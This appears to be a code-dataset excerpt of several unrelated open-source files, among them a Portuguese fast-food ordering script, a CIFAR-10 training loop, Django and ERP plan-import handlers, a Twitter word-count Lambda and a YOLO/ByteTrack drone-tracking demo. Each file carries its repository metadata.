op == \"\"\n\n# validar nomes\ndef validarnomes(nome):\n nome = ' '\n c = 0\n while len(nome) < 3:\n if c >= 1:\n escrever('DIGITE CORRETAMENTE')\n nome = input('')\n nomecaixa = nome.upper()\n return nomecaixa\n\n#cadastrar produto\ndef cadastrarproduto(p):\n limpar()\n escrever('CADASTRAR PRODUTO')\n escrever('NOME DO PRODUTO: ')\n nome = validarnomes(1)\n\n nome=nome.replace(' ','_')\n\n\n valor = 0.0\n while valor < 0.1:\n escrever('VALOR DE VENDA')\n print('EXEMPLO: 5,90')\n valoaux = input('')\n valoaux = 
valoaux.replace(',','.')\n valor = float(valoaux)\n\n\n # opcoes de estoque livre ou com quantidade de estoque\n escrever('cadastrar quantidade do produto? \\n sim [1] | não [2]')\n auxopint = input('')\n opca = int(auxopint)\n while opca < 1 or opca > 2:\n opca = int(input(''))\n\n if opca == 1:\n escrever('estoque')\n quantidadeestoque = int(input(''))\n\n if opca == 2:\n quantidadeestoque = 'LIVRE'\n\n\n escrever('CONFIRMAR PRODUTO [1]')\n escrever('CANCELAR [2]')\n op = str(input(''))\n if op == \"1\" or op == \"2\":\n if op == \"1\":\n return confirmarproduto(nome, valor,quantidadeestoque )\n if op == \"2\":\n return menu()\n else:\n op == \"\"\n\n# verificar produto no txt\ndef confirmarproduto(nome, valor, quantidadeestoque):\n with open('produtos.txt', encoding=\"utf8\") as f:\n for l_num, l in enumerate(f, 1): # percorrer linhas e enumera-las a partir de 1\n if nome in l: # ver se palavra esta na linha\n escrever(nome + ' JÁ ESTÁ CADASTRADO')\n continua=input('ENTER PARA CONTINUAR')\n cadastrarproduto(1)\n break\n\n else: # caso não haja break\n\n # abrir ou criar arquivo\n arquivo = open('produtos.txt', 'a', encoding=\"utf8\", newline=\"\")\n\n # criar linha\n liconfirmarprodutonha = str(nome)+'|'+str(valor)+'|'+str(quantidadeestoque)+'\\n'\n\n\n # escrever linha\n arquivo.write(\"%s\" % liconfirmarprodutonha)\n\n # fechar\n arquivo.close()\n\n escrever('PRODUTO CADASTRADO')\n input('ENTER PARA CONTINUAR')\n\n produto(1)\n\n# exibir produtos\ndef exibirprodutos(p):\n limpar()\n f = open('produtos.txt', 'r', encoding=\"utf8\")\n n = 0\n for line in f:\n n = n + 1\n print(str(n) +' | '+line)\n return escrever(str(n)+' PRODUTOS CADASTRADOS')\n\n# validar numero de opcao\ndef validarnumero(numero):\n numero=10\n while numero != 0 or numero != 1 or numero != 2 or numero != 3 or numero != 4 or numero != 5 or numero != 6 or numero != 6 or numero != 8 or numero != 9:\n escrever('OPÇÃO INVALIDA')\n escrever('DIGITE NOVAMENTE')\n auxnumero = str(int(''))\n numero = int(auxnumero)\n\n# add produto no pedido\ndef addproduto(produto):\n exibirprodutos(1)\n escrever('NUMERO DO PRODUTO: : ')\n index_linha = 0\n index_linha = int(input(''))\n\n firstLine = ' '\n arq = open('produtos.txt', 'r', encoding=\"utf8\")\n texto = arq.readlines()\n cont = 1\n for linha in texto:\n if index_linha == cont:\n linhadoproduto = linha\n arq.close()\n\n\n\n # logica para exluir caracteres\n # excluir o \"pular linha\"\n b = \"n\\n\\n\"\n for i in range(0, len(b)):\n linhadoproduto = linhadoproduto.replace(b[i], \"\")\n\n\n return linhadoproduto,\n\n cont = cont + 1\n arq.close()\n return escrever('produto não encontrado')\n\n# excluir produto do txt\ndef excluirproduto(p):\n exibirprodutos(1)\n escrever('NUMERO DO PRODUTO ou VOLTAR [0]')\n\n index_linha = str(input(''))\n if index_linha == '0':\n menu()\n\n index_linha = int(index_linha)- 1\n path = 'produtos.txt'\n\n with open(path,'r', encoding=\"utf8\") as f:\n texto=f.readlines()\n with open(path,'w', encoding=\"utf8\") as f:\n for i in texto:\n\n if texto.index(i)==index_linha:\n f.write('')\n escrever('EXCLUIDO!')\n else:\n if index_linha == i:\n f.write('excluido')\n else:\n f.write(i)\n\n\n menu()\n\n# diretorio do PDF\ndef meudiretorio(caminho):\n\n # importar data\n from datetime import datetime\n now = datetime.now()\n\n # criar diretorio\n #dirTemp = './'+str(now.year)+'/'+str(now.month)+'/'+str(now.day)+'/'\n dirTemp = './PEDIDOS/'\n return dirTemp\n\n# gerar um pdf detalhado do pedido para inprimir e dar para o cliente retira no balcao o seu 
pedido\ndef gerarpdfdetalhado(nome, pedido, lista,tsub, tdesc,valortotal, hora, ddd, tel):\n\n # enviar via whatsapp\n limpar()\n escrever('envar por whatsapp: sim [1] | não [2]')\n opwhats = int(input(''))\n\n\n if opwhats == 1:\n\n if len(str(tel))<3:\n tel = ''\n escrever('telefone:')\n tel = str(input(''))\n\n enviarporwhatsapp(nome, pedido, lista, tsub, tdesc, valortotal, hora, ddd, tel)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n from reportlab.pdfgen import canvas\n\n # organizar texto\n pedidoPDF = 'PEDIDO: ' + str(pedido)\n nomePDF = 'NOME: ' + str(nome)\n\n\n sub = 'SUBTOTAL: ' + \"%.2f\" % float(tsub)\n desc = 'DESCONTO: ' + \"%.2f\" % float(tdesc)\n valortotalPDF = 'TOTAL: ' +\"%.2f\" % float(valortotal)\n\n\n\n\n horaPDF = str(hora)\n listaPDF = 'DESCRIÇÃO: ' + str(lista)\n\n diretorio=meudiretorio(1)\n\n\n # escrever no pdf\n c = canvas.Canvas(diretorio+str(pedido) + '_' + nome + '_' + \"%.2f\" % float(valortotal) + '.pdf')\n c.drawString(440, 800, str(pedidoPDF))\n c.drawString(30, 800, str(nomePDF))\n c.drawString(80, 780, str(sub))\n c.drawString(200, 780, str(desc))\n c.drawString(320, 780, str(valortotalPDF))\n c.drawString(330, 800, str(horaPDF))\n\n\n tam = 580\n c.drawString(60, 600, 'DESCRIÇAO: ')\n\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n\n for um in add:\n minhalinha = minhalinha + str(um)\n\n # remover os caracteres da string\n remover = \"||\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover, \"\")\n\n # remover os caracteres da string\n remover = \"\\'\\\"][,)( \"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"|\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \" | \")\n\n # remover os caracteres da string\n remover = \".\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \",\")\n\n c.drawString(70, tam, str(minhalinha))\n tam = tam - 20\n\n\n\n\n # salvar no pdf\n c.save()\n\n\n\n\n\ndef enviarporwhatsapp(nome, pedido, lista, tsub, tdesc, valortotal, hora, ddd, tel):\n\n tel = '987088707'\n ddd = '11'\n numero ='550'+str(ddd)+str(tel)\n print(numero)\n driver.get(\"https://api.whatsapp.com/send?1=pt_BR&phone=\"+str('55011987088707'))\n time.sleep(5)\n try:\n driver.switch_to_alert().accept()\n alert = driver.switch_to.alert()\n alert.accept()\n except Exception as e:\n pass\n\n time.sleep(3)\n btn = driver.find_element_by_xpath('//*[@id=\"action-button\"]')\n btn.click()\n time.sleep(5)\n\n escrever = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\n escrever.click()\n escrever.send_keys('teste')\n\n\n\n\n\n\n\n\nlimpar()\nescrever('whatsapp: sim [1] | não [2]')\nwhatsapp = int(input(''))\n\n\nif whatsapp == 1:\n limpar()\n\n from selenium import webdriver\n\n\n from selenium.webdriver.common.keys import Keys\n driver = webdriver.Chrome()\n driver.get('https://web.whatsapp.com/')\n\n\n\n# não deixar o programa fechar\ncontinua = True\nwhile continua:\n limpar()\n menu()\n","repo_name":"DeveloperBreno/Projeto-sistema-Fast-Foot","sub_path":"sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":24572,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35071819505","text":"import argparse\nfrom datetime import datetime\nimport os\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom model import CNN\nfrom dataset import 
CIFAR10Dataset\nfrom generals import get_path\n\n# TRAINING_SET = './train_cifar10_100.csv'\n# TRAINING_SET = './train_cifar10_1000.csv'\nTRAINING_SET = './train_cifar10_full.csv'\n\n# TEST_SET = './test_cifar10_1000.csv'\nTEST_SET = './test_cifar10_full.csv'\n\ndef train(args, model, device):\n epochs, optimizer, lr, batch_size, train_data, test_data, num_workers \\\n = args.epochs, args.optimizer, args.lr, args.batch_size, args.train_data, args.test_data, args.num_workers\n \n train_path = TRAINING_SET if train_data is None else train_data\n test_path = TEST_SET if test_data is None else test_data\n\n train_set = CIFAR10Dataset(train_path, training=True)\n train_loader = DataLoader(train_set, batch_size=batch_size, num_workers=num_workers, shuffle=True)\n\n model.train()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n optim = torch.optim.Adam(model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optim, epochs)\n scaler = torch.cuda.amp.GradScaler()\n\n save_dir = get_path(os.path.join(os.getcwd(), 'runs', args.model_name))\n save_dir.mkdir(parents=True, exist_ok=True)\n last, best = save_dir / 'last.pt', save_dir / 'best.pt'\n\n result = save_dir / 'result.txt'\n\n nb = len(train_loader)\n\n best_val_acc = 0\n\n for epoch in range(epochs):\n\n pbar = tqdm(enumerate(train_loader), total=nb)\n \n for i, (images, labels) in pbar:\n optim.zero_grad()\n\n images, labels = images.to(device), labels.to(device)\n with torch.cuda.amp.autocast():\n preds = model(images)\n loss = criterion(preds, labels)\n \n scaler.scale(loss).backward()\n scaler.step(optim)\n scaler.update()\n\n pbar.set_description(f'[Training] Loss: {loss:.5f}')\n \n scheduler.step()\n\n val_acc, val_loss = val(args, model, device)\n \n if val_acc > best_val_acc:\n best_val_acc = val_acc\n \n print('*'*20)\n print(f'[New Best Accuracy] {val_acc*100:.5f}% on epoch: {epoch}')\n\n ckpt = {\n 'epoch': epoch,\n 'accuracy': val_acc,\n 'model': model,\n 'optimizer': optim.state_dict(),\n 'opt': args,\n 'date': datetime.now().isoformat()\n }\n\n torch.save(ckpt, best)\n \n print(f'Train ended on {epoch}')\n ckpt = {\n 'epoch': epoch,\n 'accuracy': val_acc,\n 'model': model,\n 'optimizer': optim.state_dict(),\n 'opt': args,\n 'date': datetime.now().isoformat()\n }\n\n torch.save(ckpt, last)\n\n result_txt = f'''\n Model Name: {args.model_name}\n Epochs: {epochs}\n Final loss: {val_loss}\n Best validation accuracy: {best_val_acc} \n '''\n with open(result, 'w') as f:\n f.write(result_txt)\n\n\n\n\ndef val(args, model, device):\n epochs, optimizer, lr, batch_size, train_data, test_data, num_workers \\\n = args.epochs, args.optimizer, args.lr, args.batch_size, args.train_data, args.test_data, args.num_workers\n\n test_path = TEST_SET if test_data is None else test_data\n\n test_set = CIFAR10Dataset(test_path, training=False)\n test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=num_workers, shuffle=False)\n\n model.eval()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n\n n = len(test_set) \n nb = len(test_loader)\n\n pbar = tqdm(enumerate(test_loader), total=nb)\n\n loss = 0\n acc = 0\n \n for epoch, (images, labels) in pbar:\n \n b = len(images)\n\n images, labels = images.to(device), labels.to(device)\n \n preds = model(images)\n \n batch_loss = criterion(preds, labels)\n batch_acc = torch.sum(torch.argmax(preds, dim=-1)==torch.argmax(labels, dim=-1)) / b\n loss += criterion(preds, labels) * b\n acc += batch_acc * b\n\n pbar.set_description(f'[Validation] Acc: {batch_acc*100:.5f}%, Loss: 
{batch_loss:.5f}')\n \n loss /= n\n acc /= n\n\n print(f'[Validation] total accuracy: {acc*100:.5f}%, total loss: {loss:.5f}')\n\n del test_set, test_loader\n\n return acc.cpu().detach().numpy(), loss.cpu().detach().numpy()\n\n\n\ndef main(opt):\n \n device = torch.device(opt.device)\n model = CNN().to(device)\n\n train(opt, model, device)\n \ndef parse_opt(known=False):\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', type=int, default=100, help='number of epochs')\n parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')\n parser.add_argument('--optimizer', type=str, choices=['SGD', 'Adam', 'AdamW'], default='Adam', help='optimizer')\n parser.add_argument('--batch-size', type=int, default=16, help='batch size')\n parser.add_argument('--train-data', type=str, default='./train_cifar10_full.csv', help='ltrain data')\n parser.add_argument('--test-data', type=str, default='./test_cifar10_full.csv', help='test data')\n parser.add_argument('--device', type=str, default='cuda:0', help='cuda device, cuda:0 or cpu')\n parser.add_argument('--num-workers', type=int, default=6, help='number of workers')\n parser.add_argument('--model-name', type=str, default='CNN_big', help='name to save model')\n\n return parser.parse_known_args()[0] if known else parser.parse_args()\n\n\ndef run(**kwargs):\n opt = parse_opt(True)\n for k, v in kwargs.items():\n setattr(opt, k, v)\n main(opt)\n return opt\n\nif __name__ == \"__main__\":\n opt = parse_opt()\n main(opt)","repo_name":"rlaskarl77/ROBOTAI2022FALL","sub_path":"hw5/q2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15022733202","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom . 
import views\nfrom .models import Link\nfrom jsonrpc.backend.django import api\nfrom lib import previews\nfrom lib.dubbels import get_all_for_pid\nfrom django.forms.models import model_to_dict\n\nurlpatterns = [\n url('^(?:model-(?P\\w+))?/?$', views.index, name='index'),\n path('loading', views.loading, name='loading'),\n url(r'stats(?:-(?P\\w+))?(?:/(?P[\\w]+)\\.(?P\\w{3}))?$', views.stats, name='stats'),\n url('evaluation(?:/(?P.+))?$', views.evaluation, name='evaluation'),\n # url('progress(?:-(?P[a-z]+))?.png$', views.progress, name='progress'),\n url('^info(?:/model-(?P[^/]+))?/(?P[^/]+)/?$', views.pid, name='pid'),\n url('^info(?:/model-(?P[^/]+))?/(?P[^/]+)/(?P[^/]+)/(?P.+)$', views.info, name='info'),\n]\n\n\n@api.dispatcher.add_method\ndef get_info(pid, words=[], request=None):\n return previews.get_info(pid, words)\n\n\n@api.dispatcher.add_method\ndef ping(request=None):\n return 'pong'\n\n\n@api.dispatcher.add_method\ndef update_item(model, pid, nmlid, status, kind, extras, request=None):\n model = views.get_model(model)\n\n # update the dubbels as well\n pids = get_all_for_pid(pid)\n items = model.objects.filter(pid__in=pids, nmlid=nmlid)\n items.update(status=status, kind=kind, extras=extras)\n return len(items)\n\n\n@api.dispatcher.add_method\ndef get_kinds(kind='', model=None, request=None):\n model = views.get_model(model)\n return [d['kind'] for d in model.objects.values('kind').distinct()]\n\n\ndef linkmodel_to_dict(model):\n result = model_to_dict(model)\n properties = ('url', 'status_class', 'status_text')\n for prop in properties:\n result[prop] = getattr(model, prop)\n return result\n\n\n@api.dispatcher.add_method\ndef get_items(amount=1, model=None, order_by='?', request=None):\n model = views.get_model(model)\n links = model.objects.filter(status=model.UNDEFINED, score__lt=0.99).order_by(order_by)[0:amount]\n return list(map(linkmodel_to_dict, links))\n\n","repo_name":"viaacode/nvdgo-namelinking","sub_path":"pywebserver/attestation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32943870968","text":"from mg_app_framework import HttpBasicHandler, MesCode, get_logger\nfrom plan_management.handlers.utils import log_exception, get_plan_db_collection, PlanStatusType, PlanType, ErpPlanStatus\nfrom datetime import datetime\nfrom pymongo import ReplaceOne\nimport json\n\n\nclass ErpPlanTransferHandler(HttpBasicHandler):\n async def post_process(self):\n \"\"\"\n url: POST /api/plan_management/erp_plan/transfer\n 发送数据app发往计划管理app数据结构:\n {\n \"plan_list\":\n [\n {\n \"task_no\": \"A181120203-00\", //字段task_serial, 必要字段\n \"task_type\": \"常规产品\", //字段task_type, 可选字段\n \"task_date\": \"2019-01-09\", //字段task_date, 可选字段\n \"material_code\": \"materiel_t901h40adc12v4_23\", //字段product_code, 必要字段\n \"material_name\": \"T901H40ADC12V 4脚 23规格\", //字段product_name, 必要字段\n \"material_spec\": \"NNC\", //字段product_spec, 可选字段\n \"material_unit\": \"个\", //字段product_unit, 必要字段\n \"plan_count\": 1000, //字段plan_num, 必要字段\n \"plan_no\": \"A181120203-00\", //字段plan_serial, 可选字段\n \"plan_start_date\": \"2019-01-10\", //字段plan_start, 必要字段\n \"plan_end_date\": \"2019-01-12\", //字段plan_end, 必要字段\n \"real_start_date\": \"2019-01-10\", //字段real_start, 可选字段\n \"real_end_date\": \"2019-01-12\", //字段real_end, 可选字段\n \"workshop_name\": \"六车间\", //字段work_center, 必要字段\n \"create_time\": \"2019-01-10\", //字段chage_time, 必要字段\n \"erp_plan_status\": \"投放\", 
//字段plan_status对应状态文字(1.锁定,2.确认,3.下达,4.投放,5.流转,6.暂停, 7.完工), 可选字段\n \"plan_status\": \"可下发\" //3种状态,可下发,已完成和不可下发, 这个字段值由上一个字段erp_plan_status决定\n }\n ]\n }\n :return:\n {\n \"code\":\"success\",\n \"info\": \"\",\n \"data\": null\n }\n \"\"\"\n from plan_management.handlers.sds import get_material_id_code_dict, get_workshop_name_code_dict, get_custom_field_config\n etl_req_data = json.loads(self.request.body)\n plan_data_list = etl_req_data['plan_list']\n plan_collection = get_plan_db_collection()\n try:\n if plan_data_list:\n material_id_code_dict = get_material_id_code_dict()\n workshop_name_code_dict = get_workshop_name_code_dict()\n custom_field_config = get_custom_field_config()\n plan_upsert_list = []\n for plan_data in plan_data_list:\n task_no = plan_data['task_no']\n existing_plan = await plan_collection.find_one({'task_no': task_no})\n # 处理定制字段, 如果一个定制字段对应的计划不存在,且该字段不在请求数据字段中,则置空\n if custom_field_config:\n for field_code in custom_field_config:\n if not existing_plan and field_code not in plan_data:\n plan_data[field_code] = ''\n\n # ERP传过来的物料编码对应主数据内的物料编号,需要转为对应的物料编码\n # 暂时完全使用erp过来的编码,后期如果有需求更新再改\n # material_identifier = plan_data['material_code']\n # if material_identifier in material_id_code_dict:\n # material_code = material_id_code_dict[material_identifier]\n # else:\n # # 如果物料编码找不到则直接保存\n # material_code = material_identifier\n # plan_data['material_code'] = material_code\n\n # 获取车间编码\n workshop_name = plan_data['workshop_name']\n workshop_code = workshop_name_code_dict[workshop_name]\n plan_data['workshop_code'] = workshop_code\n\n # ERP传过来的计划状态需要转为计划管理内部的状态值\n plan_status = plan_data['plan_status']\n if plan_status == ErpPlanStatus.can_dispatch.value:\n plan_data['plan_status'] = PlanStatusType.not_dispatched.value\n elif plan_status == ErpPlanStatus.cant_dispatch.value:\n plan_data['plan_status'] = PlanStatusType.cant_dispatch.value\n elif plan_status == ErpPlanStatus.finished.value:\n plan_data['plan_status'] = PlanStatusType.finished.value\n\n # 添加其他必须字段\n plan_data['comment'] = ''\n plan_data['product_line_code'] = ''\n plan_data['operator'] = ''\n # 录入时间写入当前时间\n if not existing_plan:\n # 仅当该计划不存在时写入录入时间\n plan_data['create_time'] = str(datetime.now())\n plan_data['modified_time'] = ''\n else:\n # 如果该计划已存在,则需要更新修改时间\n plan_data['modified_time'] = str(datetime.now())\n plan_data['dispatch_time'] = ''\n plan_data['qualified_count'] = 0\n plan_data['unqualified_count'] = 0\n plan_data['plan_type'] = PlanType.erp_import.value\n\n update_query = {'task_no': task_no}\n plan_upsert_data = ReplaceOne(update_query, plan_data, upsert=True)\n plan_upsert_list.append(plan_upsert_data)\n\n if plan_upsert_list:\n # 批量更新计划\n plan_collection.bulk_write(plan_upsert_list)\n self.send_response_data(MesCode.success, plan_data_list, '')\n get_logger().info('从ERP更新计划数据成功:{}'.format(plan_data_list))\n except Exception as e:\n log_exception(e, '从ERP更新计划数据失败')\n self.send_response_data(MesCode.fail, None, '从ERP更新计划数据失败')\n","repo_name":"angiegigishang/workPractice","sub_path":"electricalindustry/plan_management/server/src/plan_management/handlers/http_handler/etl_process_handler.py","file_name":"etl_process_handler.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25959272345","text":"import json\nimport os\nimport requests\nimport tweepy\nimport collections\n\n\ndef lambda_handler(event, context):\n\n try:\n query = event[\"queryStringParameters\"][\"id\"]\n except Exception as e:\n 
print(str(e))\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\"message\": str(e)}),\n }\n\n API_KEY = os.getenv(\"API_KEY\")\n API_ACCESS = os.getenv(\"API_ACCESS\")\n ACCESS_TOKEN = os.getenv(\"ACCESS_TOKEN\")\n ACCESS_TOKEN_SECRET = os.getenv(\"ACCESS_TOKEN_SECRET\")\n\n # Twitter API credentials\n auth = tweepy.OAuthHandler(API_KEY, API_ACCESS)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth)\n item_count = 100\n\n # tweet_list = [\n # tweet.text\n # for tweet in tweepy.Cursor(api.user_timeline, id=query).items(item_count)\n # if (list(tweet.text)[:2] != [\"R\", \"T\"]) & (list(tweet.text)[0] != \"@\")\n # ]\n\n tweet_list = [\n tweet.text\n for tweet in tweepy.Cursor(api.search_tweets, q=query, lang=\"en\").items(item_count)\n if (list(tweet.text)[:2] != [\"R\", \"T\"]) & (list(tweet.text)[0] != \"@\")\n ]\n\n temp_tweet = \" \".join(tweet_list)\n temp_list = temp_tweet.split(\" \")\n remove_list = [\n query,\n \"a\",\n \"to\",\n \"for\",\n \"in\",\n \"of\",\n \"the\",\n \"and\",\n \"is\",\n \"on\",\n \"I\",\n \"you\",\n \"it\",\n \"that\",\n \"this\",\n \"with\",\n \"at\",\n \"from\",\n \"by\",\n \"are\",\n \"as\",\n \"be\",\n \"have\",\n \"or\",\n \"an\",\n \"will\",\n \"my\",\n \"can\",\n \"not\",\n \"but\",\n \"was\",\n \"what\",\n \"your\",\n \"all\",\n \"about\",\n \"there\",\n \"if\",\n \"when\",\n \"how\",\n \"up\",\n \"out\",\n \"so\",\n \"some\",\n \"he\",\n \"she\",\n \"they\",\n \"me\",\n \"we\",\n \"us\",\n \"our\",\n \"their\",\n \"them\",\n \"his\",\n \"her\",\n \"their\",\n \"its\",\n \"am\",\n \"do\",\n \"does\",\n \"did\",\n \"doing\",\n \"done\",\n \"into\",\n \"than\",\n \"too\",\n \"very\",\n \".\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"-\",\n \"\",\n ]\n\n temp_list = [i for i in temp_list if i not in remove_list]\n counter = collections.Counter(temp_list)\n counter = counter.most_common(10)\n print(counter)\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"POST,GET,PUT,DELETE\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n },\n \"body\": json.dumps({\"tweetList\": tweet_list, \"counter\": counter}),\n }\n","repo_name":"hasesho05/backend-WordChecker-on-Twitter","sub_path":"hello_world/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13387554832","text":"import argparse\r\nimport os\r\nimport time\r\nfrom pathlib import Path\r\nimport numpy as np\r\nimport cv2\r\nimport torch\r\nimport torch.backends.cudnn as cudnn\r\nfrom numpy import random\r\nfrom models.experimental import attempt_load\r\nfrom utils.datasets import LoadStreams, LoadImages\r\nfrom utils.plots import plot_one_box\r\nfrom utils.torch_utils import time_synchronized, TracedModel\r\nimport time \r\nfrom ByteTrack.tracker.byte_tracker import BYTETracker\r\nfrom utils.visualize import plot_tracking\r\nfrom ByteTrack.tracking_utils.timer import Timer\r\nfrom DetectModel import Detect\r\nimport json\r\ndef track_demo(video_path=\"dataset/Drone-Detection&Tracking/test/01_2192_0001-1500\",save_txt=True):\r\n txt_dir = \"result_bt\"\r\n if not os.path.exists(txt_dir):\r\n os.makedirs(txt_dir)\r\n \r\n # Detected\r\n conf_thres = 0.1\r\n iou_thres = 0.25\r\n img_size = 640\r\n weights = \"runs/train/exp/weights/best.pt\"\r\n device = 0\r\n half_precision = True\r\n deteted = Detect(weights, 
device, img_size, conf_thres, iou_thres, single_cls=False, half_precision=half_precision, trace= False)\r\n \r\n # Tracking\r\n track_thresh = 0.5\r\n track_buffer = 30\r\n match_thresh = 0.8\r\n frame_rate = 25\r\n aspect_ratio_thresh = 1.6\r\n min_box_area = 10\r\n mot20_check = False\r\n res_file = os.path.join(txt_dir, video_path.split('/')[-1]+\".txt\")\r\n\r\n print(track_thresh, track_buffer, match_thresh, mot20_check, frame_rate)\r\n tracker = BYTETracker(track_thresh, track_buffer, match_thresh, mot20_check, frame_rate)\r\n timer = Timer()\r\n # cap = cv2.VideoCapture(video_path)\r\n frames=sorted(os.listdir(video_path))\r\n frames.remove(\"IR_label.json\")\r\n frame_id = 0\r\n results = []\r\n for i,frame in enumerate(frames):\r\n im0=cv2.imread(os.path.join(video_path,frame))\r\n height, width, _ = im0.shape\r\n t1 = time.time()\r\n #2-dim list\r\n if i==0:\r\n with open(os.path.join(video_path,\"IR_label.json\")) as f:\r\n res_first=json.load(f)\r\n dets=res_first[\"res\"] if \"res\" in res_first.keys() else res_first[\"gt_rect\"][0:1]\r\n dets[0][2]+=dets[0][0]\r\n dets[0][3]+=dets[0][1]\r\n dets[0].append(1.0)\r\n else:\r\n dets = deteted.inference(im0)\r\n if len(dets)>1:\r\n max_idx=0\r\n for i,d in enumerate(dets):\r\n if d[4]>dets[max_idx][4]:\r\n max_idx=i\r\n dets=dets[max_idx:max_idx+1]\r\n online_targets = tracker.update(np.array(dets), [height, width], (height, width)) if len(dets)!=0 else []\r\n online_tlwhs = []\r\n online_ids = []\r\n online_scores = []\r\n #print(len(online_targets)==0)\r\n for t in online_targets:\r\n tlwh = t.tlwh\r\n tid = t.track_id\r\n vertical = tlwh[2] / tlwh[3] > aspect_ratio_thresh\r\n online_tlwhs.append(tlwh)\r\n online_ids.append(tid)\r\n online_scores.append(t.score)\r\n # save result for evaluation\r\n tmp_list=[int(tlwh[0]),int(tlwh[1]),int(tlwh[2]),int(tlwh[3])]\r\n results.append(\r\n tmp_list\r\n )\r\n\r\n if online_targets==[]:\r\n results.append([])\r\n t2 = time.time()\r\n print(f\"FPS:{1 /(t2-t1):.2f}\")\r\n timer.toc()\r\n #print(1. / timer.average_time)\r\n # online_im = plot_tracking(im0, online_tlwhs, online_ids, frame_id=frame_id + 1, fps=1. 
/ 1 /(t2-t1))\r\n # cv2.imshow(\"Frame\", online_im)\r\n if save_txt:\r\n with open(res_file, 'w+') as f:\r\n f.write(str({\"res\":results}))\r\n \r\n return results\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--source', type=str, default='inference/images', help='source') # file/folder, 0 for webcam\r\n opt = parser.parse_args()\r\n track_demo(opt.source)","repo_name":"LighteningDarkness/Drone-Detection-and-Tracking","sub_path":"track_demo.py","file_name":"track_demo.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16603581644","text":"\"\"\"\n Package colethon\n Module scheduler_bolsas.py\n\n Modulo para agendar as tarefas relativas a bolsas de valores,\n atraves do agendador utilitario do Python (lib schedule).\n\"\"\"\n\n# ----------------------------------------------------------------------------\n# DEPENDENCIAS\n# ----------------------------------------------------------------------------\n\n# Built-in/Generic modules\nimport time\nimport logging\nfrom queue import Queue\n\n# Libs/Frameworks modules\n# Own/Project modules\nfrom colethon.conf import app_config\nfrom colethon.jobs.bolsa.download_ibovespa_b3 import DownloadIbovespaB3\nfrom colethon.jobs.bolsa.download_intraday_b3 import DownloadIntradayB3\nfrom colethon.jobs.caixa.download_loterias_caixa import DownloadLoteriasCaixa\nfrom colethon.jobs.caixa.compute_sorteios_loterias import ComputeSorteiosLoterias\nfrom colethon.jobs.infra.zip_files_mql5 import ZipFilesMql5\nfrom colethon.jobs.infra.move_files_intranet import MoveFilesIntranet\n\n\n# ----------------------------------------------------------------------------\n# VARIAVEIS GLOBAIS\n# ----------------------------------------------------------------------------\n\n# obtem uma instância do logger para o modulo corrente:\nlogger = logging.getLogger(__name__)\n\n# pilha para armazenar os jobs a serem agendados/executados sequencialmente,\n# em ordem FIFO (First In, First Out), pois Python nao eh multi-thread na real.\nqueue_jobs = Queue(maxsize=10)\n\n\n# ----------------------------------------------------------------------------\n# MAIN ENTRY-POINT\n# ----------------------------------------------------------------------------\n\n# entry-point de execucao para tarefas agendadas:\ndef main():\n logger.info(\"Iniciando agendamento dos jobs relativos a Bolsas de Valores...\")\n\n # --- Agendamento dos Jobs em Fila ---------------------------------------\n\n # Download da Carteira Teorica do IBovespa\n queue_jobs.put(DownloadIbovespaB3())\n\n # Download das Cotacoes IntraDay da B3\n queue_jobs.put(DownloadIntradayB3())\n\n # Download dos Resultados das Loterias da Caixa:\n queue_jobs.put(DownloadLoteriasCaixa())\n\n # Processamento dos sorteios das das Loterias:\n queue_jobs.put(ComputeSorteiosLoterias())\n\n # Compactar arquivos CSV nos terminais MT5\n queue_jobs.put(ZipFilesMql5())\n\n # Copiar/mover arquivos para outra estacao\n queue_jobs.put(MoveFilesIntranet())\n\n # --- Monitoramento das Execucoes ----------------------------------------\n\n # mantem parametros em variaveis locais para melhor performance:\n loop_wait = app_config.SC_time_wait\n\n # mantem o script em execucao permanente enquanto houver jobs enfileirados...\n while not queue_jobs.empty(): # tem mais jobs?\n # obtem o proximo job e dispara sua execucao:\n job_obj = queue_jobs.get() # Fila do tipo FIFO: First In (put), First Out (get)\n 
